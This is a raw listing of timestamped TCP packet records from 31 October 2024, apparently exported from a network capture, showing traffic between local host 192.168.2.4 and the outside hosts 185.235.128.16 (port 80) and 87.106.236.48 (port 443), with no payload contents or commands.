                                                                                                                                            Oct 31, 2024 17:12:26.895989895 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:26.896001101 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:26.896018982 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:26.896025896 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:26.896047115 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:26.896075010 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:27.415419102 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:27.415476084 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:27.420783043 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:27.420896053 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:27.708772898 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:27.708848000 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:27.780689001 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:28.004441977 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:28.004915953 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:28.010246992 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:28.242115974 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:28.242141008 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:28.242152929 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:28.242273092 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:28.282936096 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:28.289324999 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:28.526721954 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:28.526820898 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:28.626774073 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:28.631792068 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.075500011 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.075599909 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:29.186872005 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:29.186985016 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:29.192060947 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.192101955 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.192111969 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.192121983 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.192131996 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.192151070 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:29.192194939 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:29.192198038 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.192209005 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.192223072 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.192234039 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.192243099 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.192245007 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:29.192257881 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:29.192302942 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:29.192569971 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.192581892 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.192591906 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.192601919 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.192615032 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.192624092 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:29.192624092 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.192656040 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:29.192673922 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:29.198148966 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.198178053 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.198188066 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.198322058 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:29.203398943 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.203461885 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:29.203479052 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.203489065 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.203527927 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.203578949 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.203589916 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.203633070 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.203670025 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.203679085 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.203754902 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.203766108 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.204335928 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.204348087 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.204355955 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.204365015 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.204374075 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.204382896 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.204392910 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.204401970 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.204410076 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.204417944 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.204427004 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.204436064 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.204447985 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.204457045 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.204464912 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.204473972 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.204483032 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.204492092 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.204502106 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.204556942 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.204566002 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.204574108 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.204732895 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.204742908 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.204751015 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.204760075 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.204770088 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.204780102 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.204788923 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.204797983 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.204807997 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.208548069 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.208560944 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.208570004 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.847628117 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:29.847709894 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:29.892923117 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:29.898036003 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:30.136113882 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:30.136281013 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:30.455405951 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:30.455450058 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:30.455528975 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:30.489893913 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:30.489933968 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:31.376538992 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:31.376606941 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:31.621700048 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:31.621737957 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:31.622786999 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:31.622890949 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:31.766017914 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:31.811333895 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:32.171132088 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:32.171159029 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:32.171175003 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:32.171204090 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:32.171235085 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:32.171243906 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:32.171286106 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:32.288228989 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:32.288259983 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:32.288345098 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:32.288367987 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:32.288404942 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:32.405117035 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:32.405144930 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:32.405179977 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:32.405199051 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:32.405210018 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:32.405229092 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:32.522270918 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:32.522300959 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:32.522399902 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:32.522425890 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:32.522460938 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:32.639378071 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:32.639401913 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:32.639508009 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:32.639533043 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:32.639573097 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:32.756692886 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:32.756724119 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:32.756848097 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:32.756875038 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:32.756915092 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:32.873651981 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:32.873682976 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:32.873841047 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:32.873869896 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:32.873907089 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:32.936496973 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:32.936527014 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:32.936716080 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:32.936743975 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:32.936785936 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:33.013063908 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.013087034 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.013132095 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:33.013156891 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.013173103 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:33.013191938 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:33.129972935 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.130000114 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.130134106 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:33.130161047 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.130198002 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:33.227215052 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.227269888 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.227360010 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:33.227385998 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.227399111 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:33.227427006 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:33.343815088 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.343875885 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.343972921 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:33.343985081 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.344038010 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:33.365109921 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.365155935 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.365223885 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:33.365231037 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.365253925 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:33.365286112 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:33.462692022 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.462752104 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.462812901 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:33.462821007 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.462872982 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:33.577712059 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.577739000 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.577785969 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:33.577805996 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.577820063 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:33.577831984 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:33.619107962 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.619132042 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.619211912 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:33.619235992 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.619272947 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:33.695928097 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.695988894 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.696094036 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:33.696118116 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.696150064 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:33.696168900 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:33.811738968 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.811810017 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.811892033 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:33.811911106 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.811954021 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:33.849694967 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.849724054 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.849891901 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:33.849922895 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.849966049 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:33.929898024 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.929925919 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.930012941 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:33.930020094 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.930064917 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:33.966509104 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.966588020 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.966698885 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:33.966726065 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:33.966757059 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:33.966777086 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.046652079 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.046705961 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.046814919 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.046839952 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.046857119 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.046884060 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.112663984 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.112698078 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.112828970 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.112859011 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.112895966 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.164660931 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.164690971 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.164733887 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.164752007 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.164763927 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.164788961 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.276204109 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.276228905 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.276369095 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.276381016 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.276418924 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.281579018 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.281603098 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.281668901 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.281682968 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.281725883 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.346857071 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.346880913 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.347037077 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.347062111 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.347106934 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.398458958 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.398480892 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.398552895 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.398580074 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.398616076 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.398633003 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.463362932 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.463387966 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.463572979 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.463586092 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.463625908 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.515037060 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.515057087 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.515335083 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.515353918 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.515450954 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.580593109 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.580610991 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.580822945 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.580837965 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.580885887 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.632484913 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.632508993 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.632611990 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.632635117 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.632678032 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.669735909 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.669755936 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.669904947 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.669923067 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.669992924 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.748358965 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.748379946 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.748440981 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.748450041 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.748487949 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.750248909 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.750264883 CET4434976187.106.236.48192.168.2.4
